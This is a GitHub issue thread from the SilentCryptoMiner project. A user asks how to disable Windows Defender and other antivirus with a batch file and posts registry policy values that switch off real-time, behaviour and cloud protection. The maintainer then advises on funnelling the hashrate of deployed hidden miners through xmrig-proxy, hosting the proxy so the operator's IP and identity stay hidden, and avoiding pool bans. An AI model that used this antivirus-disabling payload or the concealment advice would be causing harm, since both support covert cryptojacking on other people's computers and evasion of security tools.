### ISSUE TITLE
disabling antivirus guard-like a devil

### ISSUE THREAD

**Issue by DARK-DEVIL-66** [UnamSanctam/SilentCryptoMiner#2002]
HEY UNAM 
HOW TO DISABLE WINDOWS DEFENDER VIA GROUP POLICY USING .bat FILE 

AND TELL ME HOW IS DISABLE ANY AV SINGLE .bat File 

Any possiblity have ?

**Comment by DARK-DEVIL-66** [comment]
what you think below the code....



[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware"=dword:00000001
"DisableRealtimeMonitoring"=dword:00000001
"DisableAntiVirus"=dword:00000001
"DisableSpecialRunningModes"=dword:00000001
"DisableRoutinelyTakingAction"=dword:00000001
"ServiceKeepAlive"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection]
"DisableBehaviorMonitoring"=dword:00000001
"DisableOnAccessProtection"=dword:00000001
"DisableScanOnRealtimeEnable"=dword:00000001
"DisableRealtimeMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates]
"ForceUpdateFromMU"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet]
"DisableBlockAtFirstSeen"=dword:00000001

**Comment by DARK-DEVIL-66** [comment]
![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/f0565ca0-7744-44f7-89f7-0380bea2e2e9)


see the screenshot i founded miners take 10 or longer time to submiting shares
so finally we do not get reward from pool i think same issue in 2miners.com

but 2miners.com stattics are never contine like this information......

**Comment by DARK-DEVIL-66** [comment]
can i speed up submiting shares  speeds can i have any possiblitys?
from builder

**Comment by UnamSanctam** [comment]
>what you think below the code....

Most of it won't work due to tamper protection, which you can't disable.

>see the screenshot i founded miners take 10 or longer time to submiting shares
so finally we do not get reward from pool i think same issue in 2miners.com
but 2miners.com stattics are never contine like this information......

I'm not sure what you mean, the average share submission time is `share difficulty/hashrate`.

>can i speed up submiting shares speeds can i have any possiblitys?
from builder

The share difficulty (share speed) is decided by the pool. Some pools allow you to set a fixed difficulty, though that can't be too low.

**Comment by DARK-DEVIL-66** [comment]
how much reqiure hashrate for solo mining ?

**Comment by DARK-DEVIL-66** [comment]
can i have chances to earn from our miners without using pool ?

**Comment by UnamSanctam** [comment]
>how much reqiure hashrate for solo mining ?

Depends on the cryptocurrency, for XMR I'd say around 5 MH/s maybe.

>can i have chances to earn from our miners without using pool ?

The profitability will be about the same over time, though you should only solo mine if you have a large hashrate. The share submission time only affects the statistics and not really the profitability. It doesn't matter if it takes 1 minute or 30 minutes to find  a share.

**Comment by DARK-DEVIL-66** [comment]
can chances to use xm-proxy+silent miner 3.4.0

**Comment by DARK-DEVIL-66** [comment]
i want to combain all low-hasrate into one  but i need to ur silent miner 
how can i intigrate with your miners like using xmproxy or any other solution u have ?

**Comment by UnamSanctam** [comment]
You simply enter your xmrig-proxy IP and port as the pool in the miner.

**Comment by DARK-DEVIL-66** [comment]
![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/f8d360cf-5c9f-47f6-9d05-05e7c0f5bea2)


why our silent miner are using old version of xmrig ?


![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/bdfac449-a3e0-41d5-af91-3e9ffc69f887)

**Comment by DARK-DEVIL-66** [comment]
> You simply enter your xmrig-proxy IP and port as the pool in the miner.

you mean inseting xm-proxy ip and port to pool tab at the building time i am correct ?

![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/0075b477-04a8-41ec-8105-32e650244a37)

**Comment by UnamSanctam** [comment]
Yes that's correct.

**Comment by DARK-DEVIL-66** [comment]
> Yes that's correct.

wonderfull 

after ward what i do the forwading all hasrate to pool what can i do from my side ?
i need to run xm-proxy in my pc ?

**Comment by DARK-DEVIL-66** [comment]
> You simply enter your xmrig-proxy IP and port as the pool in the miner.

as the port are same to pool or can i use any port ?

**Comment by UnamSanctam** [comment]
>wonderfull
after ward what i do the forwading all hasrate to pool what can i do from my side ?
i need to run xm-proxy in my pc ?

You should run xmrig-proxy on some server, that is all.

>as the port are same to pool or can i use any port ?

You can use any port, the config.json we made before used port 8888.

You should also enable "NiceHash Mining" in the miner. And you sent a screenshot of the old Silent XMR Miner instead of the newest miner.

**Comment by DARK-DEVIL-66** [comment]
xm-proxy need static ip or can use normal pc ?

**Comment by UnamSanctam** [comment]
You will need to host it somewhere, you shouldn't use your normal computer since you would have to expose your IP. And if the IP isn't static then you'll have to change it using maybe the "Remote Configuration" whenever the IP changes.

**Comment by DARK-DEVIL-66** [comment]
> You should run xmrig-proxy on some server, that is all.

xm-proxy will mining or listning on my server ?

actually i can  not have previous experiance in this metter ):

**Comment by DARK-DEVIL-66** [comment]
> You will need to host it somewhere, you shouldn't use your normal computer since you would have to expose your IP. And if the IP isn't static then you'll have to change it using maybe the "Remote Configuration" whenever the IP changes.



u mean possible to use normal computer ip (dynamic ip) + using a remote config !

**Comment by UnamSanctam** [comment]
>xm-proxy will mining or listning on my server ?
actually i can not have previous experiance in this metter ):

The xmrig-proxy will act as a proxy between your miners and the pool, the miners should connect to the xmrig-proxy and then the xmrig-proxy will handle the pool connections. The xmrig-proxy itself doesn't mine.

>u mean possible to use normal computer ip (dynamic ip) + using a remote config !

Yes that's possible but then you would be exposing your own IP, which is the same as exposing your identity.

**Comment by DARK-DEVIL-66** [comment]
have a chances to ban me from pool  using xm-proxy

**Comment by UnamSanctam** [comment]
>i cahnged xmr to zephyr config from web penal but i never changed to remote config
so any mistake made by me ?

That's fine, the web panel configuration takes priority over the "Remote Configuration" pool configuration. But if some miner is unable to connect to your web panel they will use the "Remote Configuration".

>have a chances to ban me from pool using xm-proxy

There's a much lower chance, especially since there's fewer pool connections compared to connecting directly.

**Comment by DARK-DEVIL-66** [comment]
thank's time to Clearyfy my all Doubt's
